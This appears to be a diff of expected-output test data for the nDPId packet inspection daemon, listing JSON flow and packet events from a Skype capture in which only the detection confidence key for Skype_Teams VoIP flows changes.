00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAABBe8QAAEARtE3AqAEinTfrmDLdnEEALXlam+wCJAhMYE3a2mA+K8Gsvq1dkqSohtdF5WONseMrsTgQWNCbqg=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PtsAAEAR8UnAqAEinTfrkjLdgQkAINq8m+4CkuZLUb2HgW9IroWQ+JaU9ew2O1bn"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/GQkAAEARSEjAqAEiQAQXjzLdnFIAK+Dtm\/ACn46vTpwjXGMZ9bJtrKD0Tox8o\/uW9MNcEfVIZROhfxw="} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+3+IAAEARuLHAqAEiQTffGTLdnFwAKrqUm\/ICs3eZ5yAavzTYAFVG6cHtvks6WRTX6quz\/un4rGT7CA=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/8JUAAEAR8n\/AqAEinTc4lzLdnFsAK42nm\/QCY347bApK+fSJyR3vpMK2pFmarm3qJcKY67tEOMSW2tE="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663377,"flow_last_seen":1431969663377,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969663377,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431969663377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969663377,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1DJAAEAGhNzAqAEinTeCp8N8nF+W1hb6AAAAALAC\/\/8sigAAAgQFtAEDAwUBAQgKPiLc+gAAAAAEAgAA"} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy1ywAAEARC+fAqAEinTc4pjLdnFYAHmpym\/YCUIZT7d8ZZahDgzlHGwrFeQgMHw=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAABBojAAAEARjU7AqAEi1cezmzLdnEQALVYJm\/gCocGAOu9ctMRuZg09sIXFBXfoFp0ezBOePl8z3klTgDOO8A=="} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAABA4LIAAEARBt3AqAEinTg0GzLdnFsALK5Hm\/oC27Di400dfPUDJrwFd8eoU\/psKrn9OzjyFuH7NFUpoc4x"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyTM0AAEAR4z7AqAEinTfrrTLdnEwAHgM8m\/wCyw55OL3+chZLjMlighndXw9\/qA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5cNoAAEARvzrAqAEinTfrnTLdnEoAJXKym\/4Cz\/csSQ42SRwcVm84KNSC1Bge6u0+CtZPiaQ="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1431969663505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969663505,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIpxfw3yB0ZuyltYW+6ASOJDi6AAAAgQFrAQCCApOq7XZPiLc+gEDAwk="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1431969663505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969663505,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0s6BAAEAGpXrAqAEinTeCp8N8nF+W1hb7gdGbs4AQECw5lAAAAQEICj4i3XlOq7XZ"} 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 